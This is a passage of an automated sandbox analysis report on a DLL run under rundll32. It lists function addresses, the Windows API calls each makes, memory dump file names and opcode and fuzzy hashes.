                                                                                                                                                            • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1078018258-0
                                                                                                                                                            • Opcode ID: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                                                            • Instruction ID: 37c567c5ed2abd0c262b3d9c14b2c0b98263367eb1ad4cff580600f06ae044bd
                                                                                                                                                            • Opcode Fuzzy Hash: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                                                            • Instruction Fuzzy Hash: 44112875600219EFDB409F95CA88AAE7BB9FF09390F108069F9099B260DB71DD40CFA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002665D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3354205298-0
                                                                                                                                                            • Opcode ID: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                                                            • Instruction ID: 41f5bb3622a22b3bbc1aebe7228573581b0e45adc76bddbe530eb5e3d74ee13d
                                                                                                                                                            • Opcode Fuzzy Hash: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                                                            • Instruction Fuzzy Hash: C6111C7690021AEFDF01DF94CC89EDE7BB9FF09245F004061FA04DA011E7719645CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10021616 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                                                            • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                                                            • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3704204646-0
                                                                                                                                                            • Opcode ID: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                                                            • Instruction ID: b1d6e851d134fb09cc2650d0be1f9f41ce2f018d7dad051a3fdc0e20acdc4583
                                                                                                                                                            • Opcode Fuzzy Hash: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                                                            • Instruction Fuzzy Hash: 43018479700204BFEB10DBA5DD89F5E7BACEF88750F544055F904CB291EA71EC008B60
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100155B8 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            • GetFocus.USER32 ref: 10015607
                                                                                                                                                            • GetParent.USER32(?), ref: 10015615
                                                                                                                                                            • SendMessageA.USER32 ref: 10015628
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4211600527-0
                                                                                                                                                            • Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                                                            • Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
                                                                                                                                                            • Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                                                            • Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001B96E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2353593579-0
                                                                                                                                                            • Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                                                            • Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
                                                                                                                                                            • Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                                                            • Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001B32D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                                                              • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                                                            • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Item
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 369458955-0
                                                                                                                                                            • Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                                                            • Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
                                                                                                                                                            • Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                                                            • Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1003C9F5 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3016257755-0
                                                                                                                                                            • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                                            • Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
                                                                                                                                                            • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                                            • Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002BC31 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                                                            • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3384502665-0
                                                                                                                                                            • Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                                                            • Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
                                                                                                                                                            • Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                                                            • Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1003A545 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                                                              • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                                                            • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                                                            • __lock.LIBCMT ref: 1003A581
                                                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                                                            • InterlockedIncrement.KERNEL32(00931520), ref: 1003A5C9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2880340415-0
                                                                                                                                                            • Opcode ID: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                                                            • Instruction ID: 227b034a2befce0e561f83ae0ba5e63d07179ac23aa6a18c45afd9c28011782e
                                                                                                                                                            • Opcode Fuzzy Hash: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                                                            • Instruction Fuzzy Hash: B2016D35D01E21EFEB42DB65884575D77A0FF067A3F510105E800AF291DB25BA81CBD6
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001DC85 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,C7783548), ref: 1001DCB3
                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,C7783548), ref: 1001DCC0
                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,C7783548), ref: 1001DCDB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1078018258-0
                                                                                                                                                            • Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                                                            • Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
                                                                                                                                                            • Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                                                            • Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100174CD Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                                                            • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                                                            • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                                                            • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                                                              • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$ActiveEnable$FreeResource
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 253586258-0
                                                                                                                                                            • Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                                                            • Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
                                                                                                                                                            • Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                                                            • Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002E206 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                                                            • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                                                            • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                                                            • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                                                              • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                                                              • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 685759847-0
                                                                                                                                                            • Opcode ID: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                                                            • Instruction ID: b81a2157dff59843e5c721b5fa459b83a8bef19e296eb3c7ce89af4ff474d23a
                                                                                                                                                            • Opcode Fuzzy Hash: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                                                            • Instruction Fuzzy Hash: 3BE012358D42B4CBFB04FB20ED883A93BE8FB46305F514527D04692165DB346C59DF52
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10027CC2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                            • String ID: (
                                                                                                                                                            • API String ID: 1473721057-3887548279
                                                                                                                                                            • Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                                                            • Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
                                                                                                                                                            • Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                                                            • Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100259EE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                            • String ID: @
                                                                                                                                                            • API String ID: 431132790-2766056989
